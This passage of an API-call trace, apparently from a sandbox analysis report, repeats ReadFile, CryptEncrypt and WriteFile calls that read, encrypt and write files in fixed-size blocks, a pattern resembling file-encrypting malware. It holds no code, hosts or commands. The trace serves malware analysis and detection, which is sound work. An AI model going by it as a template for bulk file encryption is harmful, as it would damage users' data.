lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.876] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.876] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.876] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.876] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.876] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.876] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.877] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.877] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.877] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.877] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.877] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.877] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.877] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.877] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.877] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.878] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.878] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.878] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.878] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.878] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.878] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.878] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.878] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.878] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.878] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.878] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.878] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.878] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.878] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.878] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.879] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.879] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.879] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.879] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.879] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.879] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.879] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.879] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.879] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.879] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.879] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.879] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.879] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.880] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.880] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.880] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.880] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.880] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.880] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.880] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.880] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.880] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.880] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.880] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.880] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.880] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.880] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.881] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.881] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.881] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.881] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.881] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.881] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.881] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.881] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.881] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.881] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.881] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.881] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.881] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.881] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.882] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.882] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.882] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.882] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.882] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.882] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.882] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.882] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.882] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.882] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.882] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.882] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.882] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.883] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.883] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.883] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.883] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.883] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.883] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.883] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.883] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.883] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.883] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.883] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.884] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.884] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.884] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.884] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.884] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.884] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.884] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: 